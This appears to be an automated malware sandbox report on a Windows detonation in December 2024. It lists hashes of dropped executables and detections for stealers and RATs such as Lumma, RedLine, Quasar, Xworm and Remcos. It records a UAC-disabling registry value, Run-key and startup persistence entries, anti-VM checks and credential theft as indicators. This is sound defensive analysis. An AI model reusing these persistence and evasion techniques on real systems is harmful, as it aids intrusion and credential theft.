SHA1 3b00864299513546759a102186b1b894f7920884
SHA256 00ef210a88f26be8dc6998d53a5eda9158f71842f590eea13d913f8ff3327cb7
SHA512 71dc95784c212b3790011660feb3cedf5aa0e6a5a44274ef52d6acbd5d9dbb70d93ce6ea36d28630ab0e26e8a2671d8ce2433feffc4b4b9fbb0864d43a1fec44

memory/6476-6256-0x0000000000400000-0x0000000000508000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/3476-19421-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe

MD5 eb89a69599c9d1dde409ac2b351d9a00
SHA1 a708e9a84067fd6c398ddfd0ac11ae48d9c41e4c
SHA256 e9de3019d8993801fd32f5e00492fa4f5d389100146a1f6f2d7170cb8b7afebd
SHA512 e8fcf4b8ad1747df2595aeea190e2710a42668d4cf5291fa40f67a5317cecb6d62819c9fb26c541e509f756a40858d4714936ab0c5da6ebf62024c098b0f1876

memory/47024-32508-0x0000000000400000-0x0000000000508000-memory.dmp

memory/6476-32520-0x0000000000400000-0x0000000000508000-memory.dmp

memory/48580-32532-0x0000000000B10000-0x0000000000FC9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 08c0f49bc6054d8a6b0804f3c1f91fdb
SHA1 07b3bab73fc4458052547eeb9c5f34b31766e034
SHA256 10300fa9009db201e36e1e49fd059f914d7768c47afc94ddfbfa853b79c24beb
SHA512 603d6c496611672bca2d97c62c4fe1ad8348e1ea64e18f2b52b92a0513403472a9b96b0c344610732448ef79c41aafef7f008ebf8890526bde27fcd0667dd7c4

C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe

MD5 0a998f0fb94d85b0972defa0b7370af3
SHA1 f2ebf87cf3d925626b90954331b68d25f68c58a7
SHA256 d78f17f719c48c64af2ad28e69c09d681171abc95535d357c2b34371bfff9c19
SHA512 6e6c26f7d8050676976694d9eae070e2f20f5075d461a4219015f977da2cf49fda54bf68e3dac82476f2119a401a1b807191210b12f5c48cfbd213ce7f9ee515

C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe

MD5 d3435ebfc26894fe8b895267ca8712b4
SHA1 60bcea02905c09e691043d05837e4942b8c4ae25
SHA256 9bb3c3efac7be81d22c386057fe49041d7e7ef3da1974ecb987cc83eae8da103
SHA512 8e884c0dcb76ca08c9674fb430b89e1bb9a3f999ac2c0078d2cefedfe72283d3249c5b9851064449294f8e39096f95c760d4c991238ed6338bb9409394872849

C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe

MD5 12c766cab30c7a0ef110f0199beda18b
SHA1 efdc8eb63df5aae563c7153c3bd607812debeba4
SHA256 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA512 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10

C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe

MD5 fcd623c9b95c16f581efb05c9a87affb
SHA1 17d1c2bede0885186b64cc615d61693eb90332de
SHA256 3eb7b830379458b4788162b6444f8b8c5b37a3190d86d8e00a6e762093e1f2b9
SHA512 7b84854c9e2d979d7b127026b2d45fdd927a857e03278f62d4c728c4a99971b7fe333739e42c65260e677df5cc174c49a817f0a03133bcab1c078683a8850c49

memory/28068-33307-0x0000000000B10000-0x0000000000FC9000-memory.dmp

memory/28068-33316-0x0000000000B10000-0x0000000000FC9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe

MD5 2f1d09f64218fffe7243a8b44345b27e
SHA1 72553e1b3a759c17f54e7b568f39b3f8f1b1cdbe
SHA256 4a553c39728410eb0ebd5e530fc47ef1bdf4b11848a69889e8301974fc26cde2
SHA512 5871e2925ca8375f3c3ce368c05eb67796e1fbec80649d3cc9c39b57ee33f46476d38d3ea8335e2f5518c79f27411a568209f9f6ef38a56650c7436bbaa3f909

C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe

MD5 e30340895091ee6f449576966e8448fb
SHA1 4ccb079e7eedbf7113a803c6859241bb56978b4f
SHA256 126d9d9886f57e39642744a8bf62681577fbee52b88fba4c4c5097b04501eade
SHA512 c9116fc043e188b50294ebf8f3b661c55d73735773f61d90ae6d2f1ad06f84aabeb80953a7cddce7e7f75cefd979f16d684c81dd853bd0673536252882a6e0ee

C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe

MD5 23544090c6d379e3eca7343c4f05d4d2
SHA1 c9250e363790a573e9921a68b7abe64f27e63df1
SHA256 b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56
SHA512 6aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c

C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe

MD5 2e87d4e593da9635c26553f5d5af389a
SHA1 64fad232e197d1bf0091db37e137ef722024b497
SHA256 561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8
SHA512 0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3

memory/11116-33381-0x0000000000190000-0x00000000001E4000-memory.dmp

memory/13096-33683-0x00000000063C0000-0x0000000006714000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\050598569159

MD5 f693ab0c91796a471eb5fc701a02ef33
SHA1 8f64112e239be6b1badeffb8e499711c9d9fd1ad
SHA256 7bf64ff61b8bc71419511801afeced998719ea48569936326037c61109fcd691
SHA512 c1e70812b6fa143f06232a9e9702ee9d42185fffdae82cafde4d3752fdb06d86f6e84ad816a6cc85dc58b24960cc344f8652b258cd6a424d0eff217fc5b4cfe0

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

273s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

161s

Max time network

301s

Command Line

winlogon.exe

Signatures

44Caliber

stealer 44caliber

44Caliber family

44caliber

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Discord RAT

stealer rootkit rat persistence discordrat

Discordrat family

discordrat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RMS

trojan rat rms

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Rms family

rms

Stealc

stealer stealc

Stealc family

stealc

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 1384 created 1324 N/A N/A C:\Windows\System32\Wbem\wmic.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Umbral

stealer umbral

Umbral family

umbral

Xworm

trojan rat xworm

Xworm family

xworm

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\XW.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\in.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50to.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\info.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\50.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\SH.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\qwex.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\ruts\rutserv.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\ProgramData\Remcos\remcos.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" C:\Users\Admin\AppData\Local\Temp\a\boleto.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A drive.google.com N/A N/A
